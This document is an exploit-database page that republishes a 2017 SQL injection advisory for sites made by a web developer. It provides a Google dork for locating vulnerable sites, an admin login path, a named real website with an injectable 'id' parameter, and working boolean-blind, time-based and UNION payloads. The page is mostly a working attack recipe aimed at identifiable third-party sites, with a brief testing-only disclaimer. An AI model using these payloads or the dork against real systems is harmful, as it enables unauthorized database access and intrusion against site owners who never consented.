Advertisement






Developed By Random Sites - SQLInjection - Upload Shell

CVE Category Price Severity
Not specified CWE-89 (SQL Injection) Unknown Critical
Author Risk Exploitation Type Date
Random Sites High Remote 2017-09-03
CPE
cpe:Not available
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090013

Below is a copy:

Developed By Random Sites - SQLInjection - Upload Shell === Title: Developed By Random Sites - SQLInjection - Upload Shell  
=== Dork:"intext:developed by : inurl:.php?ID=" 
Panel:/admin_login.php or admin,etc...
== Credit: Informacion - Anonymous
== Win10
== Date: 02/09/2017
== Dem00: "www.turnkey-instruments.com/environment.php?id=8'"
== P0ff: 
-- ---
Parameter: id (GET)
    === Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8 AND 8692=8692

    === Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=8 AND SLEEP(5)

   ===  Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-5422 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627a71,0x4d466c5a477646524b58794e664a504455505850444178447278595845516d696d7863676e444744,0x7178627a71),NULL,NULL,NULL-- JyXm
---

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum